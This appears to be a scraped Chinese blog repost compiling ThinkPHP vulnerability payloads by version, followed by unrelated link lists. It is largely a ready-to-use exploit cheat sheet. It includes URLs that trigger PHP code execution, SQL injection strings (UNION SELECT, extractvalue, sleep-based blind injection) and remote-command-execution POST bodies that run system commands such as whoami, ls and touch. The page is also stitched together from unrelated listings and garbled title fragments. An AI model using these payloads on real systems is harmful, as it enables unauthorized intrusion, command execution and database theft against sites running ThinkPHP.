%3c php $str1=,thinkphp漏洞集合
整合了一个集合,方便查询
thinkphp 5.0.22
thinkphp 5
thinkphp 5.0.21
thinkphp 5.1.*
未知版本
16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#
thinkphp 5.0.23(完整版)debug模式
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
thinkphp 5.0.23(完整版)
33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
thinkphp 5.0.10(完整版)
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system
thinkphp 5.1.* 和 5.2.* 和 5.0.*
35、(post)public/index.php (data)c=exec&f=calc.exe&_method=filter
标签:index,http,vars,漏洞,thinkphp,php,集合,think
来源: https://www.cnblogs.com/whoami101/p/10958955.html
%3c php $str1=,thinkphp漏洞集合相关推荐
- thinkphp漏洞集合
Thinkphp 5.0.22 http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username ...
- php %3c0x1a%3e是什么_利用ThinkPHP漏洞扫描攻击
利用ThinkPHP漏洞扫描攻击 115.238.244.112 119.3.90.139 94.191.10.105 POST /index.php/?s=captcha HTTP/1.1 ...
- thinkphp漏洞复现
所有文章,仅供安全研究与学习之用,后果自负! thinkphp漏洞 前言 一.thinkphp-2x-rce 代码执行 0x01 漏洞描述 0x02 影响版本 0x03 漏洞利用 0x04 漏洞修复 ...
- 【安全漏洞】Struts2漏洞集合总结
Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充. 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用d ...
- 用友OA/NC/NCCloud漏洞集合
目录 0x01声明 0x02漏洞集合 web.xml prop.xml(数据库配置) 任意文件读取 bsh.servlet.BshServlet 远程命令执行漏洞 用友 NCCloud FS 文件管理 ...
- thinkcmfx漏洞太大_thinkcmf漏洞集合
thinkcmf漏洞集合 在先知逛的时候看到的的,后面发现是thinkcmf 翻了一下自己的漏洞库对比了一下版本发现,泡泡大佬这里看的是1.6版本的,而官方最后的版本 2.2.3 所以做一下漏洞补充. ...
- Struts2 漏洞集合
Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充. 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用d ...
- FineCMS 5 0 10漏洞集合
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow 也欢迎大家转载本篇文章.分享知识,造福人民,实现我们中华民族伟大复兴! 笔记地址 ...
- ThinkPHP漏洞总结复现
ThinkPHP漏洞总结 简介 版本 Thinkphp 2.x 任意代码执行漏洞 漏洞原理 复现过程 修复意见 Thinkphp5-5.0.22/5.1.29远程执行代码漏洞 漏洞原理 影响范围 复现 ...
最新文章
- clientHeight , scrollHeight , offsetHeight之间的区别及兼容方案
- 【深度学习】图像数据集处理常用方法合集(部分基于pytorch)
- 八皇后问题 (递归 搜索)
- php小结,PHP编程小结
- 将CSDN600W用户及密码帐号存入本地MySql数据库
- MyEclipse/Eclipse 中使用javap
- python网页开发好用吗_推荐用于Web开发的最好 Python 框架
- jsp 嵌入java_关于JSP里的Java语句嵌入问题
- S5PV210裸机之外部中断
- java零碎要点013---java lambda 表达式中的双冒号的用法 ::
- 基于springboot的社区物业系统
- Nginx配置文档详解
- Xshell Xftp 免费版申请 官方正版 | 无需破解
- 使用NanoHttpd实现简易WebServer
- matlab igbt在哪,提出问题:“IGBT是什么?都在哪里有应用?”
- php识别二维码内容
- php qrcode二维码应用
- 薅羊毛php源码,薅羊毛软件-抢福袋源码分享
- [自动驾驶]高德的高精度地图
- Harbor docker login x509 certificate signed by unknown authority
热门文章
- 【Redis】redis如何保存对象
- Math之ARIMA:基于statsmodels库利用ARIMA算法对太阳黑子年数据(来自美国国家海洋和大气管理局)实现回归预测(ADF检验+LB检验+DW检验+ACF/PACF图)案例
- windows 10 开启远程控制流程
- mysql学习笔记---mysql的安装--rpm安装
- 亚马逊erp,亚马逊FBA系统,虾皮erp,仓储货代erp,跟卖ERP系统
- 手把手带你领略自动执行任务的快感
- 【调剂】哈尔滨工程大学 核学院 装置所 收调剂
- java 流压缩_java之IO流:压缩文件
- 苹果iPhone6现在手机多少钱价
- CASAIM高精度自动化三维扫描系统检测塑料件,自动检测形位公差